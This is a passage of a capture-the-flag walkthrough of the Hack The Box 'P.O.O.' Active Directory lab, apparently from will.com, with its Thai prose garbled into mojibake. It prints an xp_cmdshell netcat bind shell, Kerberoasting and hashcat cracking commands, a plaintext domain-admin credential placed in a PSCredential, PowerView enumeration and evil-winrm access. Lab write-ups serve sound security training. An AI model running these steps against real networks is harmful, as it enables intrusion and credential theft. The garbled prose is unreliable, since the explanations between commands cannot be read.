xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321 
āđāļĨāļ°āđāļĢāļēāđāļāļ·āđāļāļĄāļāđāļāļāđāļēāļāļāļĢāđāļāļāļāļĩāļāļāļāđāļĢāļē
proxychains rlwrap nc poo.htb 4321 
āđāļĨāļ°āļĄāļēāļĢāļąāļāđāļŪāļāļāļąāļ
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt 
āļāļąāļāđāļ āļāļļāļāļāđāļāļāļ§āļāļāđāļģāđāļŪāļāđāļŦāļĨāđāļēāļāļĩāđ āđāļāļ·āđāļāļāļāļēāļ rockyou āđāļĄāđāļĄāļĩāļāļāļāļēāļāļļāļāļĢāļĄāļāđāļāļĄāļđāļĨāļĢāļŦāļąāļŠāļāđāļēāļ āļāļąāļāļāļķāļāđāļāđāļāļāļāļēāļāļļāļāļĢāļĄāļĢāļŦāļąāļŠāļāđāļēāļāļāļąāđāļāļŦāļĄāļāļāļĩāđāļĄāļĩāđāļŦāđāđāļ Seclists āļŠāļģāļŦāļĢāļąāļāļāļēāļĢāđāļāļāļāļąāļāđāļĢāļēāđāļāđ hashcat
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceāđāļĨāļ°āđāļĢāļēāļāļāļĢāļŦāļąāļŠāļāđāļēāļāļāļąāđāļāļŠāļāļāļāļąāļ āļāļąāļāđāļĢāļāļāļĒāļđāđāđāļāļāļāļāļēāļāļļāļāļĢāļĄ dutch_passwordlist.txt āđāļĨāļ°āļāļąāļāļāļĩāđāļŠāļāļāļāļĒāļđāđāđāļ Keyboard-Combinations.txt


āđāļĢāļēāļĄāļĩāļāļđāđāđāļāđāļŠāļēāļĄāļāļ āđāļāļāļĩāđāļāļąāļ§āļāļ§āļāļāļļāļĄāđāļāđāļĄāļ āļĨāļāļāļŦāļēāļāļĩāđāļāļĒāļđāđāļāļāļāđāļāļēāļāđāļāļ

āđāļĒāļĩāđāļĒāļĄāļĄāļēāļ āđāļĢāļēāđāļāđāđāļĢāļĩāļĒāļāļĢāļđāđāļāļĩāđāļāļĒāļđāđ IP āļāļāļāļāļąāļ§āļāļ§āļāļāļļāļĄāđāļāđāļĄāļāđāļĨāđāļ§ āļĄāļēāļāļđāļāļąāļāļ§āđāļēāļāļđāđāđāļāđāļāļąāđāļāļŦāļĄāļāļāļāļāđāļāđāļĄāļāļĢāļ§āļĄāļāļķāļāđāļāļĢāđāļāđāļāļāļđāđāļāļđāđāļĨāļĢāļ°āļāļ āđāļāļ·āđāļāļāļēāļ§āļāđāđāļŦāļĨāļāļŠāļāļĢāļīāļāļāđāđāļāļ·āđāļāļĢāļąāļāļāđāļāļĄāļđāļĨ PowerView.ps1 āļāļēāļāļāļąāđāļāđāļĢāļēāļāļ°āđāļāļ·āđāļāļĄāļāđāļāđāļāļĒāđāļāđ evil-winrm āđāļāļĒāļĢāļ°āļāļļāđāļāđāļĢāđāļāļāļāļĢāļĩāļāđāļ§āļĒāļŠāļāļĢāļīāļāļāđāđāļāļāļēāļĢāļēāļĄāļīāđāļāļāļĢāđ -s āļāļēāļāļāļąāđāļāđāļāļĩāļĒāļāđāļŦāļĨāļāļŠāļāļĢāļīāļāļāđ PowerView

āļāļāļāļāļĩāđāđāļĢāļēāļŠāļēāļĄāļēāļĢāļāđāļāđāļēāļāļķāļāļāļąāļāļāđāļāļąāđāļāļāļąāđāļāļŦāļĄāļāđāļāđāđāļĨāđāļ§ āļāļđāđāđāļāđ p00_adm āļāļđāđāļŦāļĄāļ·āļāļāļāļđāđāđāļāđāļāļĩāđāļĄāļĩāļŠāļīāļāļāļīāļāļīāđāļĻāļĐ āļāļąāļāļāļąāđāļāđāļĢāļēāļāļ°āļāļģāļāļēāļāđāļāļāļĢāļīāļāļāļāļāļāļĄāļąāļ āļĄāļēāļŠāļĢāđāļēāļāļ§āļąāļāļāļļ PSCredential āļŠāļģāļŦāļĢāļąāļāļāļđāđāđāļāđāļāļĩāđāļāļąāļāđāļāļāļ°
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassāļāļāļāļāļĩāđāļāļģāļŠāļąāđāļ Powershell āļāļąāđāļāļŦāļĄāļāļāļĩāđāđāļĢāļēāļĢāļ°āļāļļ Creds āļāļ°āļāļđāļāļāļģāđāļāļīāļāļāļēāļĢāđāļāļāļēāļĄāļāļāļ p00_adm āđāļŠāļāļāļĢāļēāļĒāļāļ·āđāļāļāļđāđāđāļāđāđāļĨāļ°āđāļāļāļāļĢāļīāļāļīāļ§āļāđ AdminCount
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount 
āļāļąāļāļāļąāđāļ āļāļđāđāđāļāđāļāļāļāđāļĢāļēāļāļķāļāđāļāđāļĢāļąāļāļŠāļīāļāļāļīāļāļīāđāļĻāļĐāļāļĢāļīāļāđ āļĄāļēāļāļđāļāļąāļāļ§āđāļēāđāļāļēāļāļąāļāļāļĒāļđāđāđāļāļāļĨāļļāđāļĄāđāļŦāļ
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds 
āđāļāļāļĩāđāļŠāļļāļāđāļĢāļēāļāđāļĒāļ·āļāļĒāļąāļāļ§āđāļēāļāļđāđāđāļāđāđāļāđāļāļāļđāđāļāļđāđāļĨāđāļāđāļĄāļ āļŠāļīāđāļāļāļĩāđāđāļŦāđāļŠāļīāļāļāļīāđāđāļāļāļēāļĢāđāļāđāļēāļŠāļđāđāļĢāļ°āļāļāļāļąāļ§āļāļ§āļāļāļļāļĄāđāļāđāļĄāļāļāļēāļāļĢāļ°āļĒāļ°āđāļāļĨ āļĨāļāļāđāļāđāļēāļŠāļđāđāļĢāļ°āļāļāļāđāļ§āļĒ WinRM āđāļāļĒāđāļāđāļāļļāđāļĄāļāļāđāļāļāļāđāļĢāļē āļāļąāļāļŠāļąāļāļŠāļāļāļąāļāļāđāļāļāļīāļāļāļĨāļēāļāļāļĩāđāļāļāļāđāļāļĒ reGeorg āđāļĄāļ·āđāļāđāļāđ evil-winrm

āļāļēāļāļāļąāđāļāđāļĢāļēāļāđāđāļāđāļāļąāļāļāļ·āđāļāļāļĩāđāļāđāļēāļĒāļāļ§āđāļē āđāļāļ·āđāļāđāļāļ·āđāļāļĄāļāđāļāļāļąāļ WinRM āđāļāļīāļāđāļĨāļ°āđāļāļĨāļĩāđāļĒāļāļāļēāļĢāļēāļĄāļīāđāļāļāļĢāđāļāļēāļĢāđāļāļ·āđāļāļĄāļāđāļ

āđāļĢāļēāļāļĒāļēāļĒāļēāļĄāđāļāļ·āđāļāļĄāļāđāļāđāļĨāļ°āđāļĢāļēāļāļĒāļđāđāđāļāļĢāļ°āļāļ

āđāļāđāđāļĄāđāļĄāļĩāļāļ āļāļēāļāļāļąāđāļāļāļđāļāļĩāđāļāļđāđāđāļāđāđāļĨāļ°āļāļĢāļ§āļāļŠāļāļāđāļāļŠāļāđāļāđāļāļ

āļāļĩāđ mr3ks āđāļĢāļēāļāļāļāļāđāļĨāļ°āļŦāđāļāļāļāļāļīāļāļąāļāļīāļāļēāļĢāđāļŠāļĢāđāļāļŠāļĄāļāļđāļĢāļāđ 100%

āļāļąāđāļāļāļ·āļāļāļąāđāļāļŦāļĄāļ āđāļŦāđāđāļŠāļāļāļāļ§āļēāļĄāļāļīāļāđāļŦāđāļāļ§āđāļēāļāļļāļāđāļāđāđāļĢāļĩāļĒāļāļĢāļđāđāļŠāļīāđāļāđāļŦāļĄāđāļāļēāļāļāļāļāļ§āļēāļĄāļāļĩāđāļŦāļĢāļ·āļāđāļĄāđ āđāļĨāļ°āđāļāđāļāļāļĢāļ°āđāļĒāļāļāđāļāļąāļāļāļļāļāļŦāļĢāļ·āļāđāļĄāđ
āļāļļāļāļŠāļēāļĄāļēāļĢāļāđāļāđāļēāļĢāđāļ§āļĄāļāļąāļāđāļĢāļēāđāļāđāļāļĩāđ . āļāļļāļāļŠāļēāļĄāļēāļĢāļāļāđāļāļŦāļēāđāļāļ·āđāļāļŦāļēāļāļĩāđāļāđāļēāļŠāļāđāļ āļŦāļĨāļąāļāļŠāļđāļāļĢāļāļĩāđāļāļŠāļēāļāļĢāļ§āļĄ āđāļĨāļ°āļāļāļāļāđāđāļ§āļĢāđāđāļāđāļāļĩāđāļāļĩāđ āļĄāļēāļĢāļ§āļĄāļāļąāļ§āļāļąāļāđāļāđāļāļāļļāļĄāļāļāļāļĩāđāļĄāļĩāļāļđāđāļāļĩāđāđāļāđāļēāđāļāļāđāļēāļāđāļāļāļĩāļŦāļĨāļēāļĒāđ āļāđāļēāļ āđāļĨāđāļ§āđāļĢāļēāļāļ°āļŠāļēāļĄāļēāļĢāļāļāđāļ§āļĒāđāļŦāļĨāļ·āļāļāļķāđāļāļāļąāļāđāļĨāļ°āļāļąāļāđāļāļāļĢāļ°āđāļāđāļāļāđāļēāļāđāļāļāļĩāđāļĨāļ°āļāļ§āļēāļĄāļāļĨāļāļāļ āļąāļĒāļāļāļāļāđāļāļĄāļđāļĨāđāļāđāđāļŠāļĄāļ
āļāļĩāđāļĄāļē: will.com
